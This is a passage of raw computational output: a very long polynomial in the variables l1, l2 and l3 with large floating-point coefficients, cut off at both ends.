2.82072734452556e+27*l1**8*l2**3*l3**11 - 8.6874768591676e+27*l1**8*l2**3*l3**10 + 1.40887444533942e+26*l1**8*l2**3*l3**9 + 7.38843035167269e+25*l1**8*l2**3*l3**8 - 1.50673798942812e+24*l1**8*l2**3*l3**7 - 4.54320059335684e+23*l1**8*l2**3*l3**6 + 6.35633179386999e+21*l1**8*l2**3*l3**5 + 1.57477591289202e+21*l1**8*l2**3*l3**4 - 1.12173718536365e+19*l1**8*l2**3*l3**3 - 2.29743668272874e+18*l1**8*l2**3*l3**2 + 5.97366828067834e+15*l1**8*l2**3*l3 + 785139805289571.0*l1**8*l2**3 - 1.23490589924744e+32*l1**8*l2**2*l3**18 - 1.03535532277644e+33*l1**8*l2**2*l3**17 - 4.8017762217122e+31*l1**8*l2**2*l3**16 + 3.90583416325165e+31*l1**8*l2**2*l3**15 + 1.50837511940342e+30*l1**8*l2**2*l3**14 - 5.00222115851928e+29*l1**8*l2**2*l3**13 - 2.4131250989245e+28*l1**8*l2**2*l3**12 + 1.14268087626026e+27*l1**8*l2**2*l3**11 + 2.2783809238866e+26*l1**8*l2**2*l3**10 + 2.27967501670931e+25*l1**8*l2**2*l3**9 - 1.38854766514102e+24*l1**8*l2**2*l3**8 - 2.56466164025233e+23*l1**8*l2**2*l3**7 + 5.11998126926438e+21*l1**8*l2**2*l3**6 + 1.10441951472698e+21*l1**8*l2**2*l3**5 - 9.69725467131939e+18*l1**8*l2**2*l3**4 - 1.95838191124376e+18*l1**8*l2**2*l3**3 + 7.05536213595101e+15*l1**8*l2**2*l3**2 + 975342219544877.0*l1**8*l2**2*l3 - 824122315334.324*l1**8*l2**2 - 1.49810077165903e+32*l1**8*l2*l3**19 + 3.1498429382469e+32*l1**8*l2*l3**18 + 1.43641084670418e+31*l1**8*l2*l3**17 - 1.70857971770023e+31*l1**8*l2*l3**16 - 3.58388751827962e+29*l1**8*l2*l3**15 + 3.26909752419397e+29*l1**8*l2*l3**14 + 2.89531072391811e+27*l1**8*l2*l3**13 - 3.45553714167482e+27*l1**8*l2*l3**12 + 9.04587159008013e+24*l1**8*l2*l3**11 + 2.74284839170401e+25*l1**8*l2*l3**10 - 3.14989575560256e+23*l1**8*l2*l3**9 - 1.63000369681018e+23*l1**8*l2*l3**8 + 2.03061698879871e+21*l1**8*l2*l3**7 + 6.32709797833202e+20*l1**8*l2*l3**6 - 5.38622215608982e+18*l1**8*l2*l3**5 - 1.23365610734234e+18*l1**8*l2*l3**4 + 5.60619428947135e+15*l1**8*l2*l3**3 + 868146917084753.0*l1**8*l2*l3**2 - 1281968046075.63*l1**8*l2*l3 - 82412231533.4322*l1**8*l2 - 
5.95242411867481e+31*l1**8*l3**20 - 6.626513939577e+31*l1**8*l3**19 - 2.32044450955961e+30*l1**8*l3**18 + 3.69034132486023e+30*l1**8*l3**17 + 1.48818000918516e+29*l1**8*l3**16 - 7.04712521908938e+28*l1**8*l3**15 - 4.1247766713072e+27*l1**8*l3**14 + 3.58643885338069e+26*l1**8*l3**13 + 5.12012259561935e+25*l1**8*l3**12 + 1.55776095904274e+24*l1**8*l3**11 - 3.69877565772345e+23*l1**8*l3**10 - 3.64273081639469e+22*l1**8*l3**9 + 1.50544299850238e+21*l1**8*l3**8 + 2.00213213493607e+20*l1**8*l3**7 - 3.1995141297789e+18*l1**8*l3**6 - 4.65064742294903e+17*l1**8*l3**5 + 3.08140329498583e+15*l1**8*l3**4 + 441117671812893.0*l1**8*l3**3 - 824122315334.338*l1**8*l3**2 - 82412231533.4353*l1**8*l3 + 23005895.8995315*l1**8 - 1.59360608401089e+32*l1**7*l2**21 + 8.04021466776227e+32*l1**7*l2**20*l3 - 1.27782776346142e+32*l1**7*l2**20 - 1.97451680653059e+32*l1**7*l2**19*l3**2 + 7.98579885025947e+32*l1**7*l2**19*l3 + 1.61390758325858e+31*l1**7*l2**19 + 2.88736990831241e+32*l1**7*l2**18*l3**3 - 1.66882207012243e+33*l1**7*l2**18*l3**2 - 2.68878088618379e+31*l1**7*l2**18*l3 + 1.1171886899946e+31*l1**7*l2**18 + 4.00156153485467e+33*l1**7*l2**17*l3**4 + 3.05899073355496e+33*l1**7*l2**17*l3**3 + 1.91558528695768e+31*l1**7*l2**17*l3**2 - 3.90745646130371e+31*l1**7*l2**17*l3 - 4.41883985285162e+29*l1**7*l2**17 - 4.07119157072059e+32*l1**7*l2**16*l3**5 - 2.11823564371683e+33*l1**7*l2**16*l3**4 + 4.08941690947279e+31*l1**7*l2**16*l3**3 + 8.73699329818813e+31*l1**7*l2**16*l3**2 + 2.26871604914948e+29*l1**7*l2**16*l3 - 2.99385814652613e+29*l1**7*l2**16 + 1.37794176239774e+33*l1**7*l2**15*l3**6 + 1.04405074830803e+33*l1**7*l2**15*l3**5 - 1.43571802091103e+32*l1**7*l2**15*l3**4 - 1.32093584064589e+32*l1**7*l2**15*l3**3 - 3.58216235749805e+29*l1**7*l2**15*l3**2 + 7.15737399422001e+29*l1**7*l2**15*l3 + 5.29339926071983e+27*l1**7*l2**15 + 1.51287077926692e+34*l1**7*l2**14*l3**7 + 3.86046909375807e+33*l1**7*l2**14*l3**6 + 1.56445912993358e+32*l1**7*l2**14*l3**5 + 1.38287775057829e+32*l1**7*l2**14*l3**4 
- 1.73363169635672e+30*l1**7*l2**14*l3**3 - 1.62225359334033e+30*l1**7*l2**14*l3**2 + 3.53766814166718e+27*l1**7*l2**14*l3 + 3.81593646421015e+27*l1**7*l2**14 - 1.76190643385887e+34*l1**7*l2**13*l3**8 - 4.99537204675803e+33*l1**7*l2**13*l3**7 - 1.49500228784006e+32*l1**7*l2**13*l3**6 - 1.12567711264105e+32*l1**7*l2**13*l3**5 + 1.93687363483628e+30*l1**7*l2**13*l3**4 + 1.87006484529611e+30*l1**7*l2**13*l3**3 + 3.6584911613047e+27*l1**7*l2**13*l3**2 - 5.34110792694106e+27*l1**7*l2**13*l3 - 4.43712563336486e+25*l1**7*l2**13 + 3.67850926319002e+34*l1**7*l2**12*l3**9 + 8.11747957598181e+33*l1**7*l2**12*l3**8 - 6.80060836008256e+31*l1**7*l2**12*l3**7 + 4.07833298022348e+31*l1**7*l2**12*l3**6 - 3.69518217078431e+30*l1**7*l2**12*l3**5 - 2.17856416073232e+30*l1**7*l2**12*l3**4 + 2.88268489693789e+28*l1**7*l2**12*l3**3 + 1.41393076015477e+28*l1**7*l2**12*l3**2 - 7.35882848440467e+25*l1**7*l2**12*l3 - 3.23618178410463e+25*l1**7*l2**12 - 3.13885982732643e+34*l1**7*l2**11*l3**10 - 4.18379899714468e+33*l1**7*l2**11*l3**9 + 1.41222040653388e+32*l1**7*l2**11*l3**8 - 8.17314677002112e+30*l1**7*l2**11*l3**7 + 1.4503933470983e+30*l1**7*l2**11*l3**6 + 1.30025873634959e+30*l1**7*l2**11*l3**5 - 3.38360870492925e+27*l1**7*l2**11*l3**4 - 8.51028920111052e+27*l1**7*l2**11*l3**3 - 6.92648384897303e+25*l1**7*l2**11*l3**2 + 1.60804621100092e+25*l1**7*l2**11*l3 + 2.48188062001065e+23*l1**7*l2**11 + 4.24645492415507e+34*l1**7*l2**10*l3**11 + 3.40161048898286e+33*l1**7*l2**10*l3**10 - 3.52206083260989e+32*l1**7*l2**10*l3**9 - 3.1808351788458e+31*l1**7*l2**10*l3**8 - 1.54338214366234e+30*l1**7*l2**10*l3**7 - 1.03685439400257e+30*l1**7*l2**10*l3**6 + 4.18965390917898e+28*l1**7*l2**10*l3**5 + 1.55906815552267e+28*l1**7*l2**10*l3**4 - 2.71746956770428e+26*l1**7*l2**10*l3**3 - 8.84329239546889e+25*l1**7*l2**10*l3**2 + 6.05282802536507e+23*l1**7*l2**10*l3 + 1.73713670641559e+23*l1**7*l2**10 - 3.0064739170303e+34*l1**7*l2**9*l3**12 + 2.09189949857234e+33*l1**7*l2**9*l3**11 + 
2.81317335350385e+32*l1**7*l2**9*l3**10 + 3.74201508721059e+30*l1**7*l2**9*l3**9 - 1.14859551419563e+30*l1**7*l2**9*l3**8 + 1.17041730145451e+29*l1**7*l2**9*l3**7 + 1.29569096027138e+28*l1**7*l2**9*l3**6 - 5.35986937074197e+26*l1**7*l2**9*l3**5 - 1.49891582281965e+26*l1**7*l2**9*l3**4 - 8.2062464071786e+24*l1**7*l2**9*l3**3 + 7.41850770497481e+23*l1**7*l2**9*l3**2 + 6.07517965918223e+22*l1**7*l2**9*l3 - 1.07059475078085e+21*l1**7*l2**9 + 3.18099321745003e+34*l1**7*l2**8*l3**13 - 2.1146375366003e+33*l1**7*l2**8*l3**12 - 3.20646251845774e+32*l1**7*l2**8*l3**11 - 9.83833884918142e+30*l1**7*l2**8*l3**10 + 1.07169021265069e+29*l1**7*l2**8*l3**9 - 2.33418173487153e+29*l1**7*l2**8*l3**8 + 3.07870311233308e+28*l1**7*l2**8*l3**7 + 9.2980190267727e+27*l1**7*l2**8*l3**6 - 3.55635366626876e+26*l1**7*l2**8*l3**5 - 9.5938879187399e+25*l1**7*l2**8*l3**4 + 1.64104146449614e+24*l1**7*l2**8*l3**3 + 4.03566855276993e+23*l1**7*l2**8*l3**2 - 2.83566614358911e+21*l1**7*l2**8*l3 - 6.40445352538534e+20*l1**7*l2**8 - 1.68644613183201e+34*l1**7*l2**7*l3**14 + 3.88295726323628e+33*l1**7*l2**7*l3**13 + 1.36921670596146e+32*l1**7*l2**7*l3**12 - 8.72663501596475e+30*l1**7*l2**7*l3**11 - 8.51114984585965e+29*l1**7*l2**7*l3**10 - 2.86424819399064e+29*l1**7*l2**7*l3**9 + 2.16496388048181e+28*l1**7*l2**7*l3**8 + 5.53116005498545e+27*l1**7*l2**7*l3**7 - 2.65758344351349e+26*l1**7*l2**7*l3**6 - 5.76253356555726e+25*l1**7*l2**7*l3**5 + 1.59600222528979e+24*l1**7*l2**7*l3**4 + 3.09865660678677e+23*l1**7*l2**7*l3**3 - 4.13207392986152e+21*l1**7*l2**7*l3**2 - 6.10907279065498e+20*l1**7*l2**7*l3 + 3.0081885534629e+18*l1**7*l2**7 + 1.28738939996548e+34*l1**7*l2**6*l3**15 - 1.49171524205408e+33*l1**7*l2**6*l3**14 - 7.02375059607094e+31*l1**7*l2**6*l3**13 - 1.96067315852886e+31*l1**7*l2**6*l3**12 - 1.23650607252461e+30*l1**7*l2**6*l3**11 + 1.70554264846618e+29*l1**7*l2**6*l3**10 + 2.81193202366713e+28*l1**7*l2**6*l3**9 + 4.54181017166924e+27*l1**7*l2**6*l3**8 - 3.26761295752754e+26*l1**7*l2**6*l3**7 - 
7.45038623286723e+25*l1**7*l2**6*l3**6 + 2.0740213593259e+24*l1**7*l2**6*l3**5 + 4.80624844972373e+23*l1**7*l2**6*l3**4 - 6.53335359944734e+21*l1**7*l2**6*l3**3 - 1.4032167476433e+21*l1**7*l2**6*l3**2 + 7.59131541753029e+18*l1**7*l2**6*l3 + 1.43838906079608e+18*l1**7*l2**6 - 3.32458434404416e+33*l1**7*l2**5*l3**16 + 7.07627732914089e+32*l1**7*l2**5*l3**15 - 5.45278437758449e+31*l1**7*l2**5*l3**14 + 3.34441787355991e+31*l1**7*l2**5*l3**13 + 1.24913429177461e+30*l1**7*l2**5*l3**12 - 6.61263079702434e+29*l1**7*l2**5*l3**11 + 4.12715862359137e+27*l1**7*l2**5*l3**10 + 6.93412367949938e+27*l1**7*l2**5*l3**9 - 1.9784467632275e+26*l1**7*l2**5*l3**8 - 6.65252099649368e+25*l1**7*l2**5*l3**7 + 1.76998009836884e+24*l1**7*l2**5*l3**6 + 4.32563636292888e+23*l1**7*l2**5*l3**5 - 6.93986856579545e+21*l1**7*l2**5*l3**4 - 1.45436251531678e+21*l1**7*l2**5*l3**3 + 1.08342776074818e+19*l1**7*l2**5*l3**2 + 1.67326998263752e+18*l1**7*l2**5*l3 - 3.81328129996066e+15*l1**7*l2**5 + 1.92365467506874e+33*l1**7*l2**4*l3**17 + 8.31312665044224e+32*l1**7*l2**4*l3**16 + 6.14342058855512e+31*l1**7*l2**4*l3**15 - 5.10650476346062e+31*l1**7*l2**4*l3**14 - 2.15072782809898e+30*l1**7*l2**4*l3**13 + 6.36183213293794e+29*l1**7*l2**4*l3**12 + 2.98208479601012e+28*l1**7*l2**4*l3**11 - 6.12243811152203e+26*l1**7*l2**4*l3**10 - 2.76155505921872e+26*l1**7*l2**4*l3**9 - 3.77341746278232e+25*l1**7*l2**4*l3**8 + 1.78292623004884e+24*l1**7*l2**4*l3**7 + 3.7146081372885e+23*l1**7*l2**4*l3**6 - 7.11208092897582e+21*l1**7*l2**4*l3**5 - 1.54625107761235e+21*l1**7*l2**4*l3**4 + 1.39323205848444e+19*l1**7*l2**4*l3**3 + 2.68805587246597e+18*l1**7*l2**4*l3**2 - 8.7613693731442e+15*l1**7*l2**4*l3 - 1.20330535630117e+15*l1**7*l2**4 + 1.38815860976562e+32*l1**7*l2**3*l3**18 - 7.65797131297726e+32*l1**7*l2**3*l3**17 - 5.356543039059e+31*l1**7*l2**3*l3**16 + 4.39482056764004e+31*l1**7*l2**3*l3**15 + 1.25560535297793e+30*l1**7*l2**3*l3**14 - 7.40886581737807e+29*l1**7*l2**3*l3**13 - 8.18699027103315e+27*l1**7*l2**3*l3**12 + 
6.54079910163178e+27*l1**7*l2**3*l3**11 - 3.48505480452579e+25*l1**7*l2**3*l3**10 - 4.89041921802802e+25*l1**7*l2**3*l3**9 + 8.71074543423945e+23*l1**7*l2**3*l3**8 + 3.06959602824297e+23*l1**7*l2**3*l3**7 - 5.15887799310649e+21*l1**7*l2**3*l3**6 - 1.28264059853735e+21*l1**7*l2**3*l3**5 + 1.27397953290765e+19*l1**7*l2**3*l3**4 + 2.54242332398868e+18*l1**7*l2**3*l3**3 - 1.12649244334645e+16*l1**7*l2**3*l3**2 - 1.46789701711189e+15*l1**7*l2**3*l3 + 1663506155026.69*l1**7*l2**3 + 2.36320121726492e+32*l1**7*l2**2*l3**19 + 5.87790776450263e+32*l1**7*l2**2*l3**18 + 2.11593329238151e+31*l1**7*l2**2*l3**17 - 2.77694593805833e+31*l1**7*l2**2*l3**16 - 8.57986636752684e+29*l1**7*l2**2*l3**15 + 4.44602619430632e+29*l1**7*l2**2*l3**14 + 1.5510081939903e+28*l1**7*l2**2*l3**13 - 2.39698702624812e+27*l1**7*l2**2*l3**12 - 1.58357034379161e+26*l1**7*l2**2*l3**11 - 3.56614247959044e+24*l1**7*l2**2*l3**10 + 1.04861479007006e+24*l1**7*l2**2*l3**9 + 1.41356312966122e+23*l1**7*l2**2*l3**8 - 4.43211569516187e+21*l1**7*l2**2*l3**7 - 8.31239053700628e+20*l1**7*l2**2*l3**6 + 1.05516587159931e+19*l1**7*l2**2*l3**5 + 2.00994632949601e+18*l1**7*l2**2*l3**4 - 1.13260931568753e+16*l1**7*l2**2*l3**3 - 1.69952335251168e+15*l1**7*l2**2*l3**2 + 2975997249818.49*l1**7*l2**2*l3 + 206030578833.584*l1**7*l2**2 - 2.85405410167801e+31*l1**7*l2*l3**20 - 1.94497679131476e+32*l1**7*l2*l3**19 - 4.54717024971515e+30*l1**7*l2*l3**18 + 1.13073703633639e+31*l1**7*l2*l3**17 + 1.89095948335388e+29*l1**7*l2*l3**16 - 2.33632217214429e+29*l1**7*l2*l3**15 - 2.68197420047067e+27*l1**7*l2*l3**14 + 2.49525162968422e+27*l1**7*l2*l3**13 + 9.6402586911634e+24*l1**7*l2*l3**12 - 1.92995987615582e+25*l1**7*l2*l3**11 + 1.17919838102038e+23*l1**7*l2*l3**10 + 1.13476703501766e+23*l1**7*l2*l3**9 - 1.32725476444448e+21*l1**7*l2*l3**8 - 4.85600039323479e+20*l1**7*l2*l3**7 + 4.96426690273244e+18*l1**7*l2*l3**6 + 1.16987123994934e+18*l1**7*l2*l3**5 - 7.51941346253548e+15*l1**7*l2*l3**4 - 1.18204287721823e+15*l1**7*l2*l3**3 + 
2975997249818.43*l1**7*l2*l3**2 + 247236694600.291*l1**7*l2*l3 - 92023583.5981301*l1**7*l2 + 3.55368604099989e+31*l1**7*l3**21 + 3.62309397148818e+31*l1**7*l3**20 + 4.20445616344498e+29*l1**7*l3**19 - 2.26833894234698e+30*l1**7*l3**18 - 6.16111190906583e+28*l1**7*l3**17 + 4.98376396713487e+28*l1**7*l3**16 + 2.20838067258923e+27*l1**7*l3**15 - 3.83171622313484e+26*l1**7*l3**14 - 3.19578037745327e+25*l1**7*l3**13 + 5.69792590768025e+23*l1**7*l3**12 + 2.69066229934842e+23*l1**7*l3**11 + 1.77941761809808e+22*l1**7*l3**10 - 1.2940419200847e+21*l1**7*l3**9 - 1.39513208578172e+20*l1**7*l3**8 + 3.3522711460887e+18*l1**7*l3**7 + 4.25107783068314e+17*l1**7*l3**6 - 4.2086620785652e+15*l1**7*l3**5 - 586724624321225.0*l1**7*l3**4 + 1663506155026.72*l1**7*l3**3 + 206030578833.581*l1**7*l3**2 - 2.11660861968994e-5*l1**7*l3 + 13803537.5397157*l1**7 + 8.78073418795359e+31*l1**6*l2**22 - 4.17780215195051e+32*l1**6*l2**21*l3 + 5.97685571020671e+31*l1**6*l2**21 + 3.7041624342985e+32*l1**6*l2**20*l3**2 - 3.60660264720417e+32*l1**6*l2**20*l3 - 8.38014863402453e+30*l1**6*l2**20 - 2.05225368867745e+32*l1**6*l2**19*l3**3 + 8.11573049613353e+32*l1**6*l2**19*l3**2 + 1.99198218971115e+31*l1**6*l2**19*l3 - 5.20644299329176e+30*l1**6*l2**19 - 1.60721003838659e+33*l1**6*l2**18*l3**4 - 1.24604448393223e+33*l1**6*l2**18*l3**3 - 2.60669484297213e+31*l1**6*l2**18*l3**2 + 2.07192085729215e+31*l1**6*l2**18*l3 + 2.45252530298191e+29*l1**6*l2**18 + 5.22391848026993e+32*l1**6*l2**17*l3**5 + 2.53966393973839e+32*l1**6*l2**17*l3**4 + 1.23380941450793e+30*l1**6*l2**17*l3**3 - 4.97119010106633e+31*l1**6*l2**17*l3**2 - 3.26060117321362e+29*l1**6*l2**17*l3 + 1.49294629657491e+29*l1**6*l2**17 + 1.33046673794371e+33*l1**6*l2**16*l3**6 + 2.1020441616925e+33*l1**6*l2**16*l3**5 + 5.29208397992938e+31*l1**6*l2**16*l3**4 + 7.78375954360358e+31*l1**6*l2**16*l3**3 + 5.03100374665731e+29*l1**6*l2**16*l3**2 - 4.42308001609059e+29*l1**6*l2**16*l3 - 3.20996238239032e+27*l1**6*l2**16 - 
1.09175898340843e+34*l1**6*l2**15*l3**7 - 6.82351030420603e+33*l1**6*l2**15*l3**6 - 7.52616439383452e+31*l1**6*l2**15*l3**5 - 8.01866096311122e+31*l1**6*l2**15*l3**4 + 4.49042807188918e+29*l1**6*l2**15*l3**3 + 1.03338311489547e+30*l1**6*l2**15*l3**2 + 6.35076457415195e+26*l1**6*l2**15*l3 - 2.05057902536866e+27*l1**6*l2**15 + 1.62006438711302e+34*l1**6*l2**14*l3**8 + 1.07613387009691e+34*l1**6*l2**14*l3**7 + 5.78082600340301e+31*l1**6*l2**14*l3**6 + 4.69569438123759e+31*l1**6*l2**14*l3**5 - 9.52817041695187e+29*l1**6*l2**14*l3**4 - 1.38165719001661e+30*l1**6*l2**14*l3**3 - 3.65447815625277e+27*l1**6*l2**14*l3**2 + 4.04713013105889e+27*l1**6*l2**14*l3 + 2.95149958071588e+25*l1**6*l2**14 - 2.22094272293615e+34*l1**6*l2**13*l3**9 - 1.44613921857827e+34*l1**6*l2**13*l3**8 + 5.46101794263395e+31*l1**6*l2**13*l3**7 + 2.17627942459121e+31*l1**6*l2**13*l3**6 + 2.04051354236231e+30*l1**6*l2**13*l3**5 + 1.56318668578993e+30*l1**6*l2**13*l3**4 - 1.28956550319058e+28*l1**6*l2**13*l3**3 - 9.63603317311851e+27*l1**6*l2**13*l3**2 + 2.36453184279106e+25*l1**6*l2**13*l3 + 1.89384698088891e+25*l1**6*l2**13 + 1.28394121397882e+34*l1**6*l2**12*l3**10 + 1.45750823759225e+34*l1**6*l2**12*l3**9 - 9.69028414899963e+31*l1**6*l2**12*l3**8 - 8.11999476875e+31*l1**6*l2**12*l3**7 - 1.23706187367948e+30*l1**6*l2**12*l3**6 - 1.01429555802857e+30*l1**6*l2**12*l3**5 + 6.07126984600682e+27*l1**6*l2**12*l3**4 + 8.76442601323556e+27*l1**6*l2**12*l3**3 + 3.83064850786296e+25*l1**6*l2**12*l3**2 - 1.96673826282346e+25*l1**6*l2**12*l3 - 1.81467612236736e+23*l1**6*l2**12 - 2.85718376836187e+33*l1**6*l2**11*l3**11 - 1.45614395531057e+34*l1**6*l2**11*l3**10 + 1.14883997741448e+32*l1**6*l2**11*l3**9 + 1.28951424955019e+32*l1**6*l2**11*l3**8 + 1.15754376046266e+30*l1**6*l2**11*l3**7 + 5.11622590315946e+29*l1**6*l2**11*l3**6 - 2.50343580271998e+28*l1**6*l2**11*l3**5 - 1.14002719377633e+28*l1**6*l2**11*l3**4 + 1.45553523682352e+26*l1**6*l2**11*l3**3 + 6.17226783843751e+25*l1**6*l2**11*l3**2 - 
3.04131789190164e+23*l1**6*l2**11*l3 - 1.1166400530353e+23*l1**6*l2**11 - 1.52648028627707e+34*l1**6*l2**10*l3**12 + 1.23967783328439e+34*l1**6*l2**10*l3**11 + 3.15935487681362e+31*l1**6*l2**10*l3**10 - 1.32867467998444e+32*l1**6*l2**10*l3**9 - 4.70999301050928e+28*l1**6*l2**10*l3**8 + 2.328760377918e+29*l1**6*l2**10*l3**7 + 6.32187538069056e+26*l1**6*l2**10*l3**6 + 3.25364408576186e+27*l1**6*l2**10*l3**5 + 4.19966539188342e+25*l1**6*l2**10*l3**4 - 1.99729981817677e+25*l1**6*l2**10*l3**3 - 4.04737088838812e+23*l1**6*l2**10*l3**2 + 1.23083638479184e+22*l1**6*l2**10*l3 + 8.79744788389333e+20*l1**6*l2**10 + 2.20073113357797e+34*l1**6*l2**9*l3**13 - 1.15509233182038e+34*l1**6*l2**9*l3**12 - 1.28803313838007e+32*l1**6*l2**9*l3**11 + 1.30248057437397e+32*l1**6*l2**9*l3**10 + 6.54198980700759e+29*l1**6*l2**9*l3**9 - 3.9350656111702e+29*l1**6*l2**9*l3**8 - 1.84290080377488e+28*l1**6*l2**9*l3**7 - 4.79742204968318e+27*l1**6*l2**9*l3**6 + 2.11579476246392e+26*l1**6*l2**9*l3**5 + 6.4293426666982e+25*l1**6*l2**9*l3**4 - 9.91135073500237e+23*l1**6*l2**9*l3**3 - 2.7417310731097e+23*l1**6*l2**9*l3**2 + 1.80777445706905e+21*l1**6*l2**9*l3 + 4.66658862824461e+20*l1**6*l2**9 - 2.57023119232537e+34*l1**6*l2**8*l3**14 + 9.1354440476951e+33*l1**6*l2**8*l3**13 + 2.27920670420241e+32*l1**6*l2**8*l3**12 - 1.00305831362937e+32*l1**6*l2**8*l3**11 - 2.80428044593024e+29*l1**6*l2**8*l3**10 + 5.75054029384804e+29*l1**6*l2**8*l3**9 - 8.81427232619244e+27*l1**6*l2**8*l3**8 - 3.12990496289431e+27*l1**6*l2**8*l3**7 + 1.18190116541534e+26*l1**6*l2**8*l3**6 + 1.8586262861791e+25*l1**6*l2**8*l3**5 - 8.40329770348392e+23*l1**6*l2**8*l3**4 - 1.19136673713407e+23*l1**6*l2**8*l3**3 + 2.73380545358315e+21*l1**6*l2**8*l3**2 + 2.83187702349598e+20*l1**6*l2**8*l3 - 2.93072342204869e+18*l1**6*l2**8 + 1.83949894751032e+34*l1**6*l2**7*l3**15 - 7.16173237315819e+33*l1**6*l2**7*l3**14 - 1.77082803741353e+32*l1**6*l2**7*l3**13 + 7.19610913346039e+31*l1**6*l2**7*l3**12 + 5.88265780241448e+29*l1**6*l2**7*l3**11 - 
2.595458499285e+29*l1**6*l2**7*l3**10 - 1.02702622509971e+28*l1**6*l2**7*l3**9 - 1.70986008521796e+27*l1**6*l2**7*l3**8 + 1.71110472541132e+26*l1**6*l2**7*l3**7 + 4.24478744491135e+25*l1**6*l2**7*l3**6 - 1.2951975611961e+24*l1**6*l2**7*l3**5 - 3.03991558760869e+23*l1**6*l2**7*l3**4 + 4.58563499863482e+21*l1**6*l2**7*l3**3 + 1.00542466733085e+21*l1**6*l2**7*l3**2 - 6.09997104520769e+18*l1**6*l2**7*l3 - 1.27326578210354e+18*l1**6*l2**7 - 1.19975217061376e+34*l1**6*l2**6*l3**16 + 4.03827555376573e+33*l1**6*l2**6*l3**15 + 1.10235960043515e+32*l1**6*l2**6*l3**14 - 2.81908090957851e+31*l1**6*l2**6*l3**13 + 4.09601841992105e+29*l1**6*l2**6*l3**12 + 5.6631008688469e+28*l1**6*l2**6*l3**11 - 1.39627591533171e+28*l1**6*l2**6*l3**10 - 2.20262784501765e+27*l1**6*l2**6*l3**9 + 1.62907793543135e+26*l1**6*l2**6*l3**8 + 3.20559878795587e+25*l1**6*l2**6*l3**7 - 1.1833906541471e+24*l1**6*l2**6*l3**6 - 2.47286600696104e+23*l1**6*l2**6*l3**5 + 4.955476752637e+21*l1**6*l2**6*l3**4 + 9.28181520729046e+20*l1**6*l2**6*l3**3 - 9.07258180595506e+18*l1**6*l2**6*l3**2 - 1.15586295084779e+18*l1**6*l2**6*l3 + 4.44953604775964e+15*l1**6*l2**6 + 4.88809514939534e+33*l1**6*l2**5*l3**17 - 1.82394046581207e+33*l1**6*l2**5*l3**16 - 2.07104187180266e+31*l1**6*l2**5*l3**15 - 4.64031404103445e+30*l1**6*l2**5*l3**14 - 6.78364806157631e+29*l1**6*l2**5*l3**13 + 3.57421292148852e+29*l1**6*l2**5*l3**12 + 2.84888291792453e+27*l1**6*l2**5*l3**11 - 3.53230986863896e+27*l1**6*l2**5*l3**10 + 7.05833064886786e+25*l1**6*l2**5*l3**9 + 3.41675678096506e+25*l1**6*l2**5*l3**8 - 1.00076046622269e+24*l1**6*l2**5*l3**7 - 2.57370974978932e+23*l1**6*l2**5*l3**6 + 5.3063933832303e+21*l1**6*l2**5*l3**5 + 1.1528621207108e+21*l1**6*l2**5*l3**4 - 1.24433865537428e+19*l1**6*l2**5*l3**3 - 2.38885608668798e+18*l1**6*l2**5*l3**2 + 9.22782128359086e+15*l1**6*l2**5*l3 + 1.3848102705636e+15*l1**6*l2**5 - 2.03398552137292e+33*l1**6*l2**4*l3**18 + 1.94147863161807e+32*l1**6*l2**4*l3**17 - 9.83165634645037e+30*l1**6*l2**4*l3**16 + 
2.53771269098277e+31*l1**6*l2**4*l3**15 + 1.08905138314239e+30*l1**6*l2**4*l3**14 - 4.8002991952314e+29*l1**6*l2**4*l3**13 - 1.74740819187266e+28*l1**6*l2**4*l3**12 + 1.99520509284184e+27*l1**6*l2**4*l3**11 + 1.64928414482194e+26*l1**6*l2**4*l3**10 + 1.03668203718343e+25*l1**6*l2**4*l3**9 - 1.0909388290949e+24*l1**6*l2**4*l3**8 - 1.87624403029613e+23*l1**6*l2**4*l3**7 + 4.99975480660931e+21*l1**6*l2**4*l3**6 + 1.01188938794649e+21*l1**6*l2**4*l3**5 - 1.26451670945335e+19*l1**6*l2**4*l3**4 - 2.29070355794066e+18*l1**6*l2**4*l3**3 + 1.25921934013283e+16*l1**6*l2**4*l3**2 + 1.4990861412902e+15*l1**6*l2**4*l3 - 2365536275496.67*l1**6*l2**4 + 4.66421292881234e+32*l1**6*l2**3*l3**19 + 2.54666025913158e+32*l1**6*l2**3*l3**18 + 1.43415976498461e+31*l1**6*l2**3*l3**17 - 2.55716217108821e+31*l1**6*l2**3*l3**16 - 6.5076522402903e+29*l1**6*l2**3*l3**15 + 5.07594696446943e+29*l1**6*l2**3*l3**14 + 7.48730996354955e+27*l1**6*l2**3*l3**13 - 4.48053450689915e+27*l1**6*l2**3*l3**12 - 1.95622829480809e+25*l1**6*l2**3*l3**11 + 3.00862063774624e+25*l1**6*l2**3*l3**10 - 3.22105499329374e+23*l1**6*l2**3*l3**9 - 1.74777450956453e+23*l1**6*l2**3*l3**8 + 3.08456201440521e+21*l1**6*l2**3*l3**7 + 8.21821106329251e+20*l1**6*l2**3*l3**6 - 1.05976294637996e+19*l1**6*l2**3*l3**5 - 2.15853725903953e+18*l1**6*l2**3*l3**4 + 1.4249604203671e+16*l1**6*l2**3*l3**3 + 2.13946727731121e+15*l1**6*l2**3*l3**2 - 4425842063832.53*l1**6*l2**3*l3 - 336516612094.861*l1**6*l2**3 - 2.38263543780164e+32*l1**6*l2**2*l3**20 - 2.56764921731122e+32*l1**6*l2**2*l3**19 - 4.71255411578853e+30*l1**6*l2**2*l3**18 + 1.59471223998076e+31*l1**6*l2**2*l3**17 + 3.68637565713763e+29*l1**6*l2**2*l3**16 - 3.0900016169035e+29*l1**6*l2**2*l3**15 - 8.25248604622733e+27*l1**6*l2**2*l3**14 + 2.32465482341802e+27*l1**6*l2**2*l3**13 + 9.39677487826799e+25*l1**6*l2**2*l3**12 - 5.93596561593219e+24*l1**6*l2**2*l3**11 - 6.71855135686782e+23*l1**6*l2**2*l3**10 - 5.16846486548326e+22*l1**6*l2**2*l3**9 + 3.12058215130715e+21*l1**6*l2**2*l3**8 + 
